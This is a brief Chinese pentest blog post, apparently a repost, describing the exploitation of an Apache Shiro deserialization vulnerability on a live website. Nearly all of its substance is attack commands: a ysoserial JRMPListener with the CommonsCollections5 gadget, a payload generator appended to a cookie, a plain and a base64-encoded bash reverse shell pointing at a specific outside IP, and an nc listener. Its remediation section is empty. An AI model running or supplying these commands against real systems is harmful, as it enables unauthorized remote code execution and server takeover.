0x01.前言
0x02.渗透过程
1)网站环境
2)探测登录框架
3)步入洞点
4)深入探测Shiro反序列化漏洞
1.在公网 vps 执行下列命令:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1066 CommonsCollections5
bash -i > /dev/tcp/ip/port 0>& 1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1066 CommonsCollections5 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTIuNjQuODcuMy8xMjM0IDA+JiAx}|{base64,-d}|{bash,-i}”
2.使用 exp 生成 payload
Python exp.py 公网ip:port(这边有一点要避雷)
3.公网 vps 开启 nc 监听
Nc -lvp 1234 (监听1234端口)
4.抓任意 http 数据包,在 cookie 中追加 payload。GoGoGo
5.成功拿到shell
0x03.修复方案
0x04.总结
1.了解基本的网站架构
2.抓包探测确定中间件
3.了解各类中间件和框架的漏洞
4.熟悉并熟练掌握Shiro漏洞的利用方式
5.熟悉nc的使用方法
6.多积累,多学习,多练习
作者:Adminxe,转载于https://blog.csdn.net/Adminxe
关注公众号:HACK之道
本文始发于微信公众号(HACK之道):实战渗透-Shiro反序列化漏洞实例
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论